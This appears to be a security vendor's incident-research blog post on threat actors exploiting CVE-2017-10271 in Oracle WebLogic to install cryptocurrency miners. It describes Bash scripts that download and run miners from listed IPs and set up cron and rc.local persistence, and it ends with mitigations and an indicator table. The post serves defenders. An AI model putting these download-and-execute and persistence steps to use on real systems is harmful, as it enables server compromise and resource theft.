Research

Unpatched Oracle WebLogic Servers Infected with Cryptocurrency Software

By exploiting a known vulnerability on Internet-facing Oracle WebLogic servers, threat actors deployed cryptocurrency miners to Linux and Windows systems.

Unpatched Oracle WebLogic Servers Infected with Cryptocurrency Software

In December 2017, Secureworks® incident response (IR) analysts responded to multiple incidents where threat actors compromised vulnerable Internet-facing Oracle WebLogic servers on Linux and Windows systems to deploy cryptocurrency software. The unauthorized activity significantly impacted the performance of business-critical and client-facing applications. The continued inquiries about this activity in January 2018 suggest that many organizations have been affected.

Triage of the available data from compromised Linux systems revealed binary files in the /tmp directory consuming processing power and causing performance degradation. When analyzing infected hosts, IR analysts discovered a series of POST requests to /wls-wsat/CoordinatorPortType11 that resulted in an HTTP error code 500 (internal server error). The POST requests attempted to exploit WebLogic vulnerability CVE-2017-10271, which Oracle addressed in October 2017. According to the vulnerability description, this "easily exploitable" issue allows an "unauthenticated attacker with network access via HTTP to compromise [an] Oracle WebLogic Server."

Examination of client environments revealed at least two variations of a Bash script downloaded after successful exploitation. The first variation (see Figure 1) instructs the impacted system to use Wget to download "72 . 11 . 140 . 178/files/l/default" (MD5: faca70429c736dbf0caf2c644622078f) and save it to /tmp/rcp_bh. Once downloaded, rcp_bh is executed to run in the background on the compromised system.

Figure 1. Bash function to download cryptocurrency software. (Source: Secureworks)

The second script variation creates two persistence mechanisms based on the impacted service account name. As shown in Figure 2, the Bash script prints the name of the user account running the script. If the account is root, then root.sh is downloaded to /etc/root.sh and executed. If the user account is anything else, lower.sh is downloaded to the /tmp directory and executed.

Figure 2. Bash script identifying user. (Source: Secureworks)

If root.sh is executed, it downloads and executes “nativesvc” from 207. 246 . 68 . 21. The script then establishes persistence on the compromised server by creating a cron job and modifying the rc.local file to continually check for the miner and download a new copy if the check fails. If lower.sh is executed, it downloads and executes a cryptocurrency mining binary file named “river” from 207 . 246. 125 . 40 but does not create a persistence mechanism.

Windows hosts running vulnerable Oracle WebLogic servers have also been targeted. Observed attacks have downloaded open-source miners such as XMRig.

These incidents are representative of broader campaigns by financially motivated threat actors to deploy cryptocurrency mining software to large numbers of infected hosts. The market valuation of various cryptocurrencies and the ability to outsource resource costs associated with mining make this kind of activity attractive to threat actors. This type of activity will likely continue as long as cryptocurrency mining provides a return on investment for generating funds.

In addition to reviewing and applying the Oracle security update as appropriate, network defenders should implement the following mitigations. These mitigations also protect systems against other types of threats.

  • Disable unnecessary services, including internal network protocols such as SMBv1 if possible. Remove applications that do not serve a legitimate business function, and consider restricting access to integral system components such as PowerShell that cannot be removed but are unnecessary for most users.
  • Review and apply appropriate security updates for operating systems and applications in a timely manner.
  • Apply the principle of least privilege for system and application credentials, limiting administrator-level access to authorized users and contexts. For Windows systems, consider a solution such as Microsoft’s Local Administrator Password Solution (LAPS) to simplify and strengthen password management.
  • If possible, implement endpoint and network security technologies and centralized logging to detect, restrict, and capture malicious activity. Managing outbound network connections through monitored egress points can help to identify outbound cryptocurrency mining traffic, particularly unencrypted traffic using non-standard ports.

The indicators in Table 1 are associated with this threat. Note that IP addresses can be reallocated. The domains and IP addresses may contain malicious content, so consider the risks before opening them in a browser.

Indicator

Type

Context

faca70429c736dbf0caf2c644622078f

MD5 hash

Linux cryptocurrency miner

f79a2ba735a988fa6f65988e1f3d39684727bdc4

SHA1 hash

Linux cryptocurrency miner

bbc6f1e5f02b55fab111202b7ea2b3ef7b53209f6ce53f27d7f16c08f52ef9ac

SHA256 hash

Linux cryptocurrency miner

9d4356274ca394807ae0a6ad82afe2a2

MD5 hash

Linux cryptocurrency miner

b19ca7fec674543311214c25078ad7a4e1916253

SHA1 hash

Linux cryptocurrency miner

5a788286f82fc78d01dbe2e11776aed1e90b604c12eb826986973e412e0714de

SHA256 hash

Linux cryptocurrency miner

/tmp/rcp_bh

Filename

Linux cryptocurrency miner on disk

/tmp/nativesvc

Filename

Linux cryptocurrency miner on disk

/tmp/river

Filename

Linux cryptocurrency miner on disk

/tmp/watch-smartd

Filename

Linux cryptocurrency miner on disk

/tmp/Carbon

Filename

Linux cryptocurrency miner on disk

pool . minexmr . com

Domain name

Associated with cryptocurrency mining activity

pool . supportxmr . com

Domain name

Hosting cryptocurrency mining software

72 . 11 . 140 . 178

IP address

Hosting cryptocurrency mining software

207 . 246 . 68 . 21

IP address

Hosting cryptocurrency mining software

191 . 101 . 180 . 84

IP address

Hosting downloader scripts for cryptocurrency mining software

207 . 246 . 125 . 40

IP address

Hosting cryptocurrency mining software


Table 1. Indicators for this threat.
Back to all Blogs

GET THE LATEST SECURITY UPDATES

Thank you for your submission.

Try Taegis Today

Request a demo to see how Taegis can reduce your risk, optimize your existing security investments, and fill your talent gaps.